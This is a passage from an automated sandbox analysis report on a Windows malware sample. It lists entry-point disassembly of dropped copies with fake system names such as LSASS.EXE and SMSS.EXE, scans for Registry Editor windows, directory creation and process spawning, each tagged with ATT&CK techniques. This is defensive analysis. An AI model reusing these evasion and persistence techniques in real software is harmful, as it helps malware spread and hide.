al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4D17.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE48F7.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4660.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4804.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e4e6c@ADVAPI32.dll\"\n \"0e000f00703f4e6c@ADVAPI32.dll\"\n \"0e000f00cc3f4e6c@ADVAPI32.dll\"\n \"11001200b4474e6c@ADVAPI32.dll\"\n \"1100120048484e6c@ADVAPI32.dll\"\n \"120013008c484e6c@ADVAPI32.dll\"\n \"12001300e4484e6c@ADVAPI32.dll\"\n \"14001500dc6f4e6c@ADVAPI32.dll\"\n \"14001500f46f4e6c@ADVAPI32.dll\"\n \"140015000c704e6c@ADVAPI32.dll\"\n \"1700180024704e6c@ADVAPI32.dll\"\n \"0d000e003c704e6c@ADVAPI32.dll\"\n \"110012004c704e6c@ADVAPI32.dll\"\n \"1100120060704e6c@ADVAPI32.dll\"\n \"0f001000a0714e6c@ADVAPI32.dll\"\n \"14001500e0714e6c@ADVAPI32.dll\"\n \"14001500f8714e6c@ADVAPI32.dll\"\n \"0c000d0040724e6c@ADVAPI32.dll\"\n \"0c000d0050724e6c@ADVAPI32.dll\"\n \"0e000f0060724e6c@ADVAPI32.dll\"\n \"0e000f0070724e6c@ADVAPI32.dll\"\n \"0b000c0080724e6c@ADVAPI32.dll\"\n \"18001900b8744e6c@RPCRT4.dll\"\n \"13001400e4744e6c@RPCRT4.dll\"\n \"14001500f8744e6c@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"RegEdit_RegEdit\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for window \"Registry Editor\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for window \"Folder Options\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for window \"Local Settings\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"ExploreWClass\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"CabinetWClass\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"RebarWindow32\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"ComboBoxEx32\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"ComboBox\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"Edit\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00003404)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002088)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004612)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005216)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005116)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003492)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00003404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00002520)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00002088)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"SXS.DLL\" at base 74e30000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"DWMAPI.DLL\" at base 73840000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"SHELL32.DLL\" at base 75260000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"OLE32.DLL\" at base 76030000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"USER32\" at base 75eb0000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"KERNEL32\" at base 76e50000\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76e50000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"D3_08.exe\" loaded 